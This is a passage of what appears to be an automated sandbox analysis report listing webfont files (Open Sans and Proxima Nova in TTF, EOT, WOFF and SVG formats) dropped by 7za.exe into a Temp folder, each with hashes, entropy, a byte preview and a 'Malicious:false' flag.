      Reputation:low
      Preview:....U.............................LP....[ .@(.......... .......&....................O.p.e.n. .S.a.n.s.....B.o.l.d.....V.e.r.s.i.o.n. .1...1.0.....O.p.e.n. .S.a.n.s. .B.o.l.d.....BSGP.....................Yv.Y|.X.....`.g.iSyR..&U:.47.4.....mj...1.....I.PJQ.....,.4.,..woh..9...q.....Ab..........fsr..x.N..L..z............YU,.8zL)RA...9.'..Z..IQ.%..Y..=...F}.8=...9X..z.z..g..._=y[..V5..7.h.>>M...K....P.x.....n\u3.*..:.."..sA..&.jY.P.Y.....+...<.#...#..E.ZL.......J.....T..s.:....F.C?..d.N..60.?.g..j.....[)g!..2".X..l..n08....D.v...r5[f[.j..l.R...Ee.j...s........v...l..<8...P.....F..+.n..b...!.,vy"...9.\`.I....]........MpEh...A.kO.V.jm.7.>....E...Z..U...8,%.Q5:S5?..(.Dw.CQ.g......b..E....-...H7U........................H.E'._'.}.........6pBSL#f%q%=.!.XeP......1.5..)...3}..}m.m.<.....u.fC.!..pw.....>K...b......O.~...m......;9....Ry.Y.a.Q4.V. .../l0..p%..*.......h. a.({........S.5...i...U.%.Jk..6..5<.Y..O.#..x.@j....S._.!3s_*.=...<..\..$._..Sj.|{<.....I[.n.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:TrueType Font data, 17 tables, 1st "FFTM", 12 names, Microsoft, language 0x409, Digitized data copyright \251 2010-2011, Google Corporation.Open SansBoldwebfontOpen Sans BoldVe
      Category:dropped
      Size (bytes):104500
      Entropy (8bit):6.561986967600059
      Encrypted:false
      SSDEEP:
      MD5:D0EA09C0D9DA1716983F837FA3C960EA
      SHA1:77F7FD3248B715D3298845D92EFB5A11EB5D8D96
      SHA-256:E46A201BF8C7AF30A978D3D0D8584778DF831F46B70EFD4532EDAFD1091F8106
      SHA-512:1084E34A6D472CCF9D30876C3269DC7E05B48F689AAA47AF3C86B2F2F14850116CB9217F3DF7533693409927ECB497009D6F745A670DB91FD53A0FB7AFA18089
      Malicious:false
      Reputation:low
      Preview:............FFTMh..T........GDEF.;.....8... OS/2.H.}...X...`cmap4"..........cvt ...........0fpgmS./........egasp....... ....glyf-N.....(..p.head.yT...y....6hhea......yP...$hmtx......yt...8loca@...........maxp........... name.sO.........post.<s.........prep.-._........webfGeW....,.............=.......B.......'.....................................%.........3.......3.....f..................@. [...(....1ASC. ..%..f.f...... ........^..... .....................................f.@...&...~...........................................@.S.x........................ . . . . " & / : _ .!"%........ ...........................................?.R.x........................ . . . . " & / 9 _ .!"%..................................................a.P.,.......".!. .............................._........................................................................................................................................................................................................................
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Embedded OpenType (EOT), Open Sans family
      Category:dropped
      Size (bytes):49728
      Entropy (8bit):7.977203460042813
      Encrypted:false
      SSDEEP:
      MD5:66A0B9BD337A3668E953E92F7F3FC6EC
      SHA1:7ABF2D65772B80C3A1967A1A03998DD2B84E6A3B
      SHA-256:F725E655A42AB99B3F59CA4770E0C5FA9DE28EFD1C30164111748BE2EC771602
      SHA-512:50B87738329765CE4B480CECF568325F3D5D6FE9CF2BDAACD216D433752FB0A4F28791E93E35B9B04A71128573320E96A04A543253B1BE94089C02FDBD85A83E
      Malicious:false
      Reputation:low
      Preview:@...r.............................LP....[ .@(.......... ......#.....................O.p.e.n. .S.a.n.s.....I.t.a.l.i.c.....V.e.r.s.i.o.n. .1...1.0... .O.p.e.n. .S.a.n.s. .I.t.a.l.i.c.....BSGP..................$j.a..a..a.....`.g.iSyR..&U:.47.4.....mj...1.....I.PJQ.....,.4.,..wop.,sL1..1.7.SB....'...T...v9.GI.Ok>Y'.<....t.<.5..U......P.A...y..U..]RV...<.e./....4....x........._.#.;.d.,.:K..>..}....>?.>q.6.... 0.g.U.p..S;\oHB!..2.h"a..#.n.....DE.64$..X...T..V..Z&.....P[a(.:.....G.4.... _K..E......A..hl...2...V./d>..<.....<.....p..n....v4.L.!....XF..6...*}nk.]..........1..G.=1..H..T..|..!.c...0.`....:i.@.......zI.W..Gur~.4}<...`....y......U../......k.J.=~...MNw.Dt.Z..CQ..(r.......b..ZF2k.Y!..WA......a6Yh.ja;.b&L.QE.......#.0b..^..V<~.6`K".....a...p.]O..(.H.aw.NhLz..*.V.2...A..ee.h.....t..[........B|........aF.9.w...J.CK7...W..Rs.4=.Mp&.....!.".....B^).^.@U.....de...Z..#!..P!!.6..j....I.E....y.(..).2,]F.-*..Z 2v2....!...W.Y.....e2........O.E`..D.l.U.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:TrueType Font data, 17 tables, 1st "FFTM", 12 names, Microsoft, language 0x409, Digitized data copyright \251 2010-2011, Google Corporation.Open SansItalicwebfontOpen Sans Ital
      Category:dropped
      Size (bytes):128816
      Entropy (8bit):6.643749146022899
      Encrypted:false
      SSDEEP:
      MD5:E736CDDB14832F4F66F4E52A9BBBDB10
      SHA1:09824527515255E892D2AF783D48D01366DA7051
      SHA-256:B31D5C8DE10DB7428AB6D50EF7074C967659397874AE8CD8F445DECBD6828BC6
      SHA-512:10B70F5F61FDD3492D789F9B710A90F28EB33AC5BE2100111E0EF97D312881F934E15C19EE4F4E49B4B74404BBB2A1A3E51EDAD8C5D2F9F00C2481D16F5EDA39
      Malicious:false
      Reputation:low
      Preview:............FFTMh..w........GDEF.;.....8... OS/2..p...X...`cmap4"..........cvt ...........LfpgmS./........egasp.......<....glyf.......D....head..T....D...6hhea.......|...$hmtx-M.1......8loca5]. ........maxp........... name..Q!........post.0s.........prep7v.K.......IwebfGiW....(.............=.......cH......'.....................................z.........3.......3.....f..................@. [...(....1ASC....%..f.f...b.M ........H..... .....................................f.@...&...~...........................................@.S.x........................ . . . . " & / : _ .!"%........ ...........................................?.R.x........................ . . . . " & / 9 _ .!"%..................................................a.P.,.......".!. .............................._........................................................................................................................................................................................................................
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Embedded OpenType (EOT), Open Sans family
      Category:dropped
      Size (bytes):41447
      Entropy (8bit):7.975908842176924
      Encrypted:false
      SSDEEP:
      MD5:88A9C629F26F8563A72EAC95CB0744BC
      SHA1:484BCA13532678133DC14A668C580BE2C1346526
      SHA-256:3AE576BFA96D7CF6614C8C97290C7ABE03191A8CEB0C837A21E7FFE70D66CA62
      SHA-512:B4CDAA3A5A46EF368E9138C9874AA1173B466BC660D5BBBD13FC3F10F509CDA9AF151A2667ECD079935D60992B1436F6D5843CED5A063769E19E67F84C402AF9
      Malicious:false
      Reputation:low
      Preview:.................................LP....[ .@(.......... .... .9.....................O.p.e.n. .S.a.n.s.....R.e.g.u.l.a.r.....V.e.r.s.i.o.n. .1...1.0...".O.p.e.n. .S.a.n.s. .R.e.g.u.l.a.r.....BSGP...................@.[..[..X.....`.g.iSyR..&U:.47.4.....mj...1.....I.PJQ.....,.4.,..woj..9...w.....Ab...........9.GI.O#nY'.<....i.jy.J.k....7\.."..!.E'....u..*+.U.....`x.J....Mv.7HY.........y..>[....qe..4>{{..cg...0...(Y..1............-.0..GL...B....?. ....9<B........_.f.i...w...../...v...i(,..........l`...HD:..#...V...TY-dF.08.k..&..`...V*8...XSn....Z|...).-*..5+UZ..W,.....)....(yC..l.c.1 ..1.....I.@.Y(.(p.J.\..9....H.c.M.....d.tc.~...".47[..-...si........../...*..oj.S..*.E.?P..N.]{S....2...3..C.c..3+....ZK<..W.Z\..'h..r..q.<...!_hRd..$iE&5...N..........8.....`.....;<..*.!.e.Hdf!.....`._7,.!|..H.xgA8......u.kP.:.Jk...8l$.]n.d;v.....E...9Abd;...c...f...8.uh..g......A2..w......,.!*q...H.PyB.......I!.$..?.....?U.......G`.o.l.lA`|.-O.<d....:.h..!Z.2.\..t.n.....R.s2
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:TrueType Font data, 17 tables, 1st "FFTM", 12 names, Microsoft, language 0x409, Digitized data copyright \251 2010-2011, Google Corporation.Open SansRegularwebfontOpen Sans Reg
      Category:dropped
      Size (bytes):101820
      Entropy (8bit):6.575715653136188
      Encrypted:false
      SSDEEP:
      MD5:45D9F4020B92BE6DE67FF22B671C3E2F
      SHA1:60E9C9CA7B14B173046C3DE2DFCCCB225207FFD7
      SHA-256:A3D775A1EF0EF8B7456FEB404DE74B7C960EACAF65E8E17B135F2E482441A892
      SHA-512:44D86DE447A52B77B7F1119132099C58150B6E7D3AA339A3256EAC616241C7811ED524DB77F3C1269079F9DB5A6B372B67D11D30B76166061A070D55F2D79162
      Malicious:false
      Reputation:low
      Preview:............FFTMh..B........GDEF.;.....8... OS/2.......X...`cmap4"..........cvt ...........FfpgmS./........egasp.......8....glyf...f...@..ephead..T...m....6hhea.g....m....$hmtx.....n....8locaC..\..vD....maxp......zd... name..P4..z.....post.<s...||....prep@.....<...vwebfGhW..................=.......51......'...............................................3.......3.....f..................@. [...(....1ASC.@..%..f.f...b.S ........H..... .....................................f.@...&...~...........................................@.S.x........................ . . . . " & / : _ .!"%........ ...........................................?.R.x........................ . . . . " & / 9 _ .!"%..................................................a.P.,.......".!. .............................._........................................................................................................................................................................................................................
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Embedded OpenType (EOT), Open Sans Semibold family
      Category:dropped
      Size (bytes):39702
      Entropy (8bit):6.298598474864845
      Encrypted:false
      SSDEEP:
      MD5:3FAB39A75284A0A9C09563CB64E683D2
      SHA1:BAE936C579E21F00462C125BC9E7929A59104362
      SHA-256:B3E6E116A5E39ACECD9AFD4BADE07E96B4CC79CE43FD8E2329D0E9A421BC80A0
      SHA-512:54128E527B8680CF9900C0C17465B9D1AE00ADDBA0C015DB4A71DCF632D621F74F74FBB1269FDF77676DB9F555387C7CACF09EDF41CF1E4EADA9D95FE6CAD850
      Malicious:false
      Reputation:low
      Preview:....4.......................X.....LP....[ .@(.......... ....)..I..................$.O.p.e.n. .S.a.n.s. .S.e.m.i.b.o.l.d.....R.e.g.u.l.a.r.....V.e.r.s.i.o.n. .1...1.0...4.O.p.e.n. .S.a.n.s. .S.e.m.i.b.o.l.d. .R.e.g.u.l.a.r................0FFTMc_.....<....GDEF.......X... GPOS-r.B...x....GSUB.b..........OS/2..........`cmap.ol.... ....cvt *r.....$...<fpgm..zA...`....gasp............glyf../.......s.head...0.......6hhea...........$hmtx..R....@....loca.U.b........maxp........... namex..d........post............prep.D".........webfh.Q....,.............=.......L.}...............................................T.b..DFLT..cyrl.&grek.2latn.>..................................................kern.......................r.....`...............X...X.........X.~.X...................(.R.(.d...v.....(.(...R.:.:.v.:...........................X.X.X.X.X.X.X...........~.............(.(.(.(.(.(.(.(.`.(.:.(.:...................1.$.q.7.).9.).:.).<...D...F...G...H...J...P...Q...R...S...T...U...V...X.....q...q...q
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:TrueType Font data, 19 tables, 1st "FFTM", 17 names, Microsoft, language 0x409, Digitized data copyright \251 2011, Google Corporation.Open Sans SemiboldRegularAscender - Open
      Category:dropped
      Size (bytes):39476
      Entropy (8bit):6.305473088148055
      Encrypted:false
      SSDEEP:
      MD5:B32ACEA6FD3C228B5059042C7AD21C55
      SHA1:0B72DB51C3DB686963FDC5E8C05B92645D0161B5
      SHA-256:9F8567EA7C2D954377D5A3C26BDAF666FF993DD6A2D4E7E6931917A0286514A2
      SHA-512:95772DC94425E7801C90B4F98FF069F2C423FA86D096B5043D0CC8B3B43935B9DA12EEA00D0894706FF0C7BC522B5EA62528F591A0297BCDE20C5B6EFB00B019
      Malicious:false
      Reputation:low
      Preview:...........0FFTMc_.....<....GDEF.......X... GPOS-r.B...x....GSUB.b..........OS/2..........`cmap.ol.... ....cvt *r.....$...<fpgm..zA...`....gasp............glyf../.......s.head...0.......6hhea...........$hmtx..R....@....loca.U.b........maxp........... namex..d........post............prep.D".........webfh.Q....,.............=.......L.}...............................................T.b..DFLT..cyrl.&grek.2latn.>..................................................kern.......................r.....`...............X...X.........X.~.X...................(.R.(.d...v.....(.(...R.:.:.v.:...........................X.X.X.X.X.X.X...........~.............(.(.(.(.(.(.(.(.`.(.:.(.:...................1.$.q.7.).9.).:.).<...D...F...G...H...J...P...Q...R...S...T...U...V...X.....q...q...q...q...q...q.......................................................................................................-.....&...*...2...4...7.q.8...9...:...<.............................................................7.......q..
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Embedded OpenType (EOT), Proxima Nova Rg family
      Category:dropped
      Size (bytes):144482
      Entropy (8bit):6.676758116275043
      Encrypted:false
      SSDEEP:
      MD5:BE0E58130A84B19C8523345478A0BD3F
      SHA1:35DFEA056F715D8191F2647E56C214AFAF819EEC
      SHA-256:1C3A470BF710204B1DBD65679B914AF4B94E7F018B1F7DF3D61FF863D6F335D9
      SHA-512:C0CA4A33842D69FAD8F1795864C9B592D2CEDD62B14EFEB46676823460EA50693CCC884891D16F4BA1FFDD5E0A80F9D06FD6E65FE184F3EA283FF441E7B874C6
      Malicious:false
      Reputation:low
      Preview:b4...3............................LP.......P........... ....>.......................P.r.o.x.i.m.a. .N.o.v.a. .R.g.....B.o.l.d.....V.e.r.s.i.o.n. .2...0.0.3...".P.r.o.x.i.m.a. .N.o.v.a. .B.o.l.d................pFFTMz.....3.....GDEF...D.......ZGPOSM3.....`..4.GSUBS.q....$...:OS/2~=.l...x...`cmap.....t....gasp............glyf?.1... t....head.A(n.......6hhea.,.....4...$hmtx............loca.+v....$...Pmaxp.p.n...X... name..` ........post..Q.......) ..........>_.<..................8.......-.F.................\.....l.....-.................'.....'.k.................@...................3.......3.....f..................P...........mlss. .....R.R...\.b .............. .........................b.?.Z...#...=...5.+.1...Z.`.T.`.#...3...;...`.f.=...`.......F.I.....B...)...3...d...F.\.1...H...=...`...`...;...;...;.....C.H.x...M...~.F...............F.....1.........../.............F.......F.$.....+...3.....x...X...X...(.....V.=.`.....=.#...'.........X.B.......B...B.l.B.......B.......f...-.G............
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:SVG Scalable Vector Graphics image
      Category:dropped
      Size (bytes):489617
      Entropy (8bit):5.214096922263478
      Encrypted:false
      SSDEEP:
      MD5:53DC6F191C3A88750D2119B076A066EC
      SHA1:123E9CF8C270A6188ED0A28BDD8B2E010DB3507F
      SHA-256:455D6047EDD314813200F7FE8E82DD509CF1DBA128EBBB67DA7E1BEE72946062
      SHA-512:6F843E1C979D4B117BD4814A0DD175BD3C00E73AAFAED751A86F6E07872A0233F4ED7616DA2246F1EE8747981EF445709D7AF46155A58C972F4C1C4D9CC86111
      Malicious:false
      Reputation:low
      Preview:<?xml version="1.0" standalone="no"?>.<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd" >.<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">.<metadata>.Created by FontForge 20170731 at Thu Jan 28 10:27:03 2021. By Aleksey,,,.Copyright (c) Mark Simonson, 2005. All rights reserved..</metadata>.<defs>.<font id="ProximaNova-Bold" horiz-adv-x="1185" >. <font-face . font-family="Proxima Nova Rg". font-weight="700". font-stretch="normal". units-per-em="2048". panose-1="2 0 5 6 3 0 0 2 0 4". ascent="1618". descent="-430". x-height="989". cap-height="1366". bbox="-352 -590 2349 1862". underline-thickness="40". underline-position="-312". unicode-range="U+000D-FB04". />.<missing-glyph horiz-adv-x="989" .d="M854 -184h-719v1724h719v-1724zM788 -123v1602h-589v-1602h589z" />. <glyph glyph-name="f_f_j" unicode="ffj" horiz-adv-x="1857" .d="M1118 0h-262v762h-164v227h1
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:TrueType Font data, 15 tables, 1st "FFTM", 28 names, Macintosh
      Category:dropped
      Size (bytes):144284
      Entropy (8bit):6.67938260495495
      Encrypted:false
      SSDEEP:
      MD5:4E2FCE4B2872C71C99094A40CA379C66
      SHA1:74C329BF82DE4EB3B3F3D74BA3CF2DFDF892BC4C
      SHA-256:5B932752434D7DBECFAAFAE01832AEC0A6A6C9CBD87119280C1D5C7CEBD8AE13
      SHA-512:5ED5EA7BECF0F7FD140EA015C9FEBFBE096077E94D7BF1E35D3A14743B07C2860CBF58EA2DCCD2C398647C937B6B6F1BD0007172F60E143DE6C147EBEA631CDE
      Malicious:false
      Reputation:low
      Preview:...........pFFTMz.....3.....GDEF...D.......ZGPOSM3.....`..4.GSUBS.q....$...:OS/2~=.l...x...`cmap.....t....gasp............glyf?.1... t....head.A(n.......6hhea.,.....4...$hmtx............loca.+v....$...Pmaxp.p.n...X... name..` ........post..Q.......) ..........>_.<..................8.......-.F.................\.....l.....-.................'.....'.k.................@...................3.......3.....f..................P...........mlss. .....R.R...\.b .............. .........................b.?.Z...#...=...5.+.1...Z.`.T.`.#...3...;...`.f.=...`.......F.I.....B...)...3...d...F.\.1...H...=...`...`...;...;...;.....C.H.x...M...~.F...............F.....1.........../.............F.......F.$.....+...3.....x...X...X...(.....V.=.`.....=.#...'.........X.B.......B...B.l.B.......B.......f...-.G.................B.......=.......+.............&.............V.M.......M.#...5.......`...B.f./.../.(........./.\...9.Z...?.7.=...;.f.=...H.....|.)...;.-.H.-.B...........7...`.....I...=.=.7.=.........^.B./.'.x..
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Web Open Font Format, TrueType, length 58736, version 0.0
      Category:dropped
      Size (bytes):58736
      Entropy (8bit):7.992826265200207
      Encrypted:true
      SSDEEP:
      MD5:A3932B53CB250B684B63D1E04AF5603E
      SHA1:B06C657DF6B320B915A17455848E66695A9FC68E
      SHA-256:2A8F208D9D8556FF58DA8A420316DE6D634A568A0EEB94C043430659FFF7D338
      SHA-512:E8E68301DDE147B7C79E21689066B7C9653A82F9898C2C76F4060AF1A48C7F997F4797DE5002E870E9FFBA05EFCB47F10CAE5B8BEADBE7909A85DE4C04C54730
      Malicious:false
      Reputation:low
      Preview:wOFF.......p......3.........................FFTM...T........z...GDEF...l...S...Z...DGPOS...4......4.M3..GSUB.......s...:S.q.OS/2.......Z...`~=.lcmap...X..........gasp...d............glyf.......m....?.1.head...X...6...6.A(nhhea.......!...$.,..hmtx...0...&........loca...L...M...P.+v.maxp........... .p.nname.......q......` post..........) ..Q...........>_.<..................8.......-.F............x.c`d``..;...3....9u..".E.........x.c`d``Qg.f`g..& f.B...0........x.c`b^.......u..1...<.f...........D.,``z....7......3(0..fa...........8.$...i6.R``...+....x.Wmh.W.....5......~.4. K.%.YRW..jZ.%,!.%.R.D,j..."...H..l.0.6...!H..E.?M...."!."..V.VM..wf...q.p..{.>..;.m..~....*.tZ...P..K.....B....!P...f..-..V.J.. ...j.Uz..z.j.5..M{.&.Auz...N(..x...a..r{.5...i..9BMf.rz.....<OQN.Q...J.J....}.}.....k...MP.....g.9.)R&.<3....2....g.J+G......"...G(k.M.T.8....QV.Q..Io.v.AY=.....v....7.V.QT.^w.......mk.........{.e....,.x.<....p~.....F]O.....{.!5.;x.0.f.7Q3....c.}T..bL..Y.....!
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Embedded OpenType (EOT), Proxima Nova Lt family
      Category:dropped
      Size (bytes):63036
      Entropy (8bit):5.967294764368419
      Encrypted:false
      SSDEEP:
      MD5:EE9163C34F600221169F8FF531E97182
      SHA1:57F0B2C837C94F2A0DF47EE62B4639FD6426BFA0
      SHA-256:53F30A622DB68CEBE92DBD384CC292AEF13AD7E3349A10A77C29326E10634C21
      SHA-512:D51E2A5F6DF706EAA2C5FFA071A9A9C08E58A30B4AF64A1CCBE81F8E9C38F20429DF665CABAF295129490AFC639B7E19C0FCED428610A284A17899C3290904CB
      Malicious:false
      Reputation:low
      Preview:<...l.......................,.....LP.......P........... .....(......................P.r.o.x.i.m.a. .N.o.v.a. .L.t.....L.i.g.h.t.....V.e.r.s.i.o.n. .2...0.0.3...*.P.r.o.x.i.m.a. .N.o.v.a. .L.t. .L.i.g.h.t................0FFTMi.....<....GDEF.\.....X... GPOS......x..&.GSUBi.q...'.....OS/2.P....,T...`cmap......,.....cvt .]....0....0fpgmS./...0....egasp......34....glyfo..A..3<....head..........6hhea...........$hmtx.op....,....loca...........`maxp.L.\...H... nameaq.!...h....post.S.-...<...Eprep.qk........webf.7XZ...d.............=...............A..........................................,..latn................kern......................$..... <"..G.:...5.......^.5.........'.....s.........................................................................................^.........\.........w.....3.....{................................................................................................................................................................................................
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:SVG Scalable Vector Graphics image
      Category:dropped
      Size (bytes):100224
      Entropy (8bit):5.115337740933845
      Encrypted:false
      SSDEEP:
      MD5:6942D42196D3356DCEC29A4737A0AC68
      SHA1:E437E1A9FC5BC2A639533C699425D55A87B08BF9
      SHA-256:8E3FE8B36F91652FD295EFB026873BDE460C2B10D0D53F21183157121DCF3AA1
      SHA-512:FE8069F1EC4648C74418F133C1345DB1EA4302077277D243A1F8A0CF3DB12FB1B2C9AB4E934643401CDE57DF48DC10DDD9C461BEAB0AAB70F808456688593D1A
      Malicious:false
      Reputation:low
      Preview:<?xml version="1.0" standalone="no"?>.<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd" >.<svg xmlns="http://www.w3.org/2000/svg">.<metadata></metadata>.<defs>.<font id="webfontregular" horiz-adv-x="1105" >.<font-face units-per-em="2048" ascent="1618" descent="-430" />.<missing-glyph horiz-adv-x="530" />.<glyph horiz-adv-x="0" />.<glyph horiz-adv-x="0" />.<glyph unicode="&#xd;" horiz-adv-x="0" />.<glyph unicode=" " horiz-adv-x="530" />.<glyph unicode="&#x09;" horiz-adv-x="530" />.<glyph unicode="&#xa0;" horiz-adv-x="530" />.<glyph unicode="!" horiz-adv-x="448" d="M135 72q0 35 25.5 61.5t62.5 26.5t64.5 -27t27.5 -61q0 -37 -27.5 -63.5t-64.5 -26.5t-62.5 26.5t-25.5 63.5zM156 1366h137l-27 -1010h-84z" />.<glyph unicode="&#x22;" horiz-adv-x="649" d="M119 1313q0 31 20.5 52t53.5 21q31 0 52 -21.5t21 -51.5l-43 -439h-61q-43 412 -43 439zM383 1313q0 31 21.5 52t52 21t52 -21.5t21.5 -51.5l-43 -439h-61q-43 412 -43 439z" />.<glyph unicode="#" horiz-adv-x="11
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:TrueType Font data, 19 tables, 1st "FFTM", 19 names, Microsoft, language 0x409, Copyright (c) Mark Simonson, 2005. All rights reserved.Proxima Nova LtLightMarkSimonson: Proxima
      Category:dropped
      Size (bytes):62916
      Entropy (8bit):5.970108863002856
      Encrypted:false
      SSDEEP:
      MD5:1BBE13B77BC82CE6F95FA4FBBA53CA00
      SHA1:DDD8D67742A83294C77C405A5FF896BF1651F018
      SHA-256:E2A2FAA64FBFABAC156A99961A7AFBD5E1B5C8D2AAEA8E79C5076652587D0A3E
      SHA-512:0EE4CBEFAC0FFB55A9ED69F0BF4ECFF7F9A7C3A7F6ED918D7802E14CA115411460A0AD4EF2321CDB17C33A90A92D279739C8953C728AF38DBB20E63F6C39BF87
      Malicious:false
      Reputation:low
      Preview:...........0FFTMi.....<....GDEF.\.....X... GPOS......x..&.GSUBi.q...'.....OS/2.P....,T...`cmap......,.....cvt .]....0....0fpgmS./...0....egasp......34....glyfo..A..3<....head..........6hhea...........$hmtx.op....,....loca...........`maxp.L.\...H... nameJ..t...h...*post.S.-......Eprep.qk.........webf.8XZ.................=...............A..........................................,..latn................kern......................$..... <"..G.:...5.......^.5.........'.....s.........................................................................................^.........\.........w.....3.....{.................................................................................................................................................................................................................................u..............................................................................................................................................................................
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Web Open Font Format, TrueType, length 27788, version 1.0
      Category:dropped
      Size (bytes):27788
      Entropy (8bit):7.983108071030193
      Encrypted:false
      SSDEEP:
      MD5:1970F82ADB3619E3AB4E83E81881E2C5
      SHA1:59063EB3ED9BE781E680CE88B374857B875D90E0
      SHA-256:49FA230FC49401A83DD324D4834A1E6844C8D176BD888C522456E178BA038E28
      SHA-512:1F4B70165AC7A048EF8B6D061FBDB8ABA9C54C6BDD8EBDF0F09F17A46EE3C904322B8785CAF5AB320536EA4FA9F635E16D7B58DA99EF38C1664153EC2380343B
      Malicious:false
      Reputation:low
      Preview:wOFF......l.................................FFTM............i..GDEF........... .\..GPOS..........&....GSUB.......t....i.q.OS/2.......X...`.P..cmap...`...w........cvt .......0...0.]..fpgm...........eS./.gasp................glyf......QC....o..Ahead..a....2...6...hhea..a<...!...$....hmtx..a`.........op.loca..d8...Y...`....maxp..f.... ... .L.\name..f........*J..tpost..hx...j...E.S.-prep..k.........qk.webf..l..........8XZ.........=...............A.x.c`d``..b...`b`d`d...,`....P.b.x..Zkh\E.>w.}l...4....k..I.....C..%..G.m.?.TbZ.....#.Z....J.E.....K...E.b........./..B..<nv.....+u..w....9s.3..AD.i......S'i...!f.-.k..)p.jhs..*r...=...~@.P.FTp.C<..(..<D...S<.....|......O.....K)%.....(r....A..rP..|..A..`WP.I..U...i....C...S...s.9.8.I.@.9;.......Bi.%.3b..9.%Hv.Gb.(.Z..c....w\j.`...h......c...7...x...u?....B.0).v.i..h.._v..#..Q.2.#...<.O..IE.R.LF.L..:.8.<..%..|.:....v...3>.>.<..j..K=<h.z..?|L'.....p.."Oi.^.......m-.",B.:"...SY..16.LX.'i~..}....7....u.z..*.........S<....pq....Mm.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Embedded OpenType (EOT), Proxima Nova Rg family
      Category:dropped
      Size (bytes):66124
      Entropy (8bit):6.1018210364586265
      Encrypted:false
      SSDEEP:
      MD5:E5835857D5DDDDA8D5F0725A386A2D0E
      SHA1:4C92001174816E973C374986E52AF2428AF2F6B6
      SHA-256:750E86DC4965D1D63216327777239692FCAF377106E0ED9E3B1E73E7EB89B2A8
      SHA-512:4EEE43C691475031BC219BD6BD7001128B62A22B69B89E7668434318B72DB61942A58EE85AB49F4864ABEBEB451B68145543325F1D42840DAE7F90B7EA363DD9
      Malicious:false
      Reputation:low
      Preview:L...t.............................LP.......P........... ....U.......................P.r.o.x.i.m.a. .N.o.v.a. .R.g.....R.e.g.u.l.a.r.....V.e.r.s.i.o.n. .2...0.0.3.....P.r.o.x.i.m.a. .N.o.v.a. .R.g. .R.e.g.u.l.a.r................0FFTMi.....<....GDEF.a.....X... GPOS......x..&.GSUBi.r...'.....OS/2...C..,d...`cmap.e....,.....cvt ./....0....@fpgmS./...0....egasp......34....glyf.9[...3<...Phead.........6hhea...........$hmtx.XgH........loca..........jmaxp.Q.m...$... namec......D....post......(...Vprep.(.F........webf.:XZ...l.............=...............A......................3...................,..latn................kern......................$..... <"..G.:...9.......b.9.........1.....w.........................................................................................b.........\.........}.....3.....s........................................................................................................................................................................................
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:SVG Scalable Vector Graphics image
      Category:dropped
      Size (bytes):108364
      Entropy (8bit):5.08375234669651
      Encrypted:false
      SSDEEP:
      MD5:0438E356DD0ABF43B482117ED3D82BDE
      SHA1:5CF78BFCC2B2EC34A1FBC97F4E135D36E19460AE
      SHA-256:FF0C9829E5CDFC514145E395B89EC93D2C0E534886816AE9F5757A6AD23ECC9E
      SHA-512:8F692F4C364702F2A48E04CD9AB090936C6F6909091CB0F343119E86A4021A82543910B50B3A56115032934305CCF3DD4771AE5E1973EB87C0F0221563D21195
      Malicious:false
      Reputation:low
      Preview:<?xml version="1.0" standalone="no"?>.<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd" >.<svg xmlns="http://www.w3.org/2000/svg">.<metadata></metadata>.<defs>.<font id="webfontregular" horiz-adv-x="1171" >.<font-face units-per-em="2048" ascent="1618" descent="-430" />.<missing-glyph horiz-adv-x="528" />.<glyph horiz-adv-x="0" />.<glyph horiz-adv-x="0" />.<glyph horiz-adv-x="682" />.<glyph unicode="&#xd;" horiz-adv-x="682" />.<glyph unicode=" " horiz-adv-x="528" />.<glyph unicode="&#x09;" horiz-adv-x="528" />.<glyph unicode="&#xa0;" horiz-adv-x="528" />.<glyph unicode="!" horiz-adv-x="471" d="M123 92q0 46 33.5 79.5t79.5 33.5t79 -33.5t33 -79.5q0 -45 -33.5 -78.5t-78.5 -33.5q-46 0 -79.5 34t-33.5 78zM139 1366h193l-33 -983h-127z" />.<glyph unicode="&#x22;" horiz-adv-x="702" d="M111 1292q0 38 27 66t65 28q39 0 66.5 -27.5t27.5 -66.5q0 -13 -13.5 -125t-27.5 -217l-14 -106h-76q-55 419 -55 448zM408 1292q0 39 27.5 66.5t66.5 27.5q38 0 65 -28t27 -66q0 -
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:TrueType Font data, 19 tables, 1st "FFTM", 19 names, Microsoft, language 0x409, Copyright (c) Mark Simonson, 2005. All rights reserved.Proxima Nova RgRegularMarkSimonson: Proxi
      Category:dropped
      Size (bytes):65996
      Entropy (8bit):6.105038199944939
      Encrypted:false
      SSDEEP:
      MD5:05408DA76886F69E48AB8252638A1B78
      SHA1:F9E57E79A4685750EF27AD186BB8D70692143224
      SHA-256:15EDA04768999C2F92C30063B8F3AC556A48184D968FE3B0008F49BA49404314
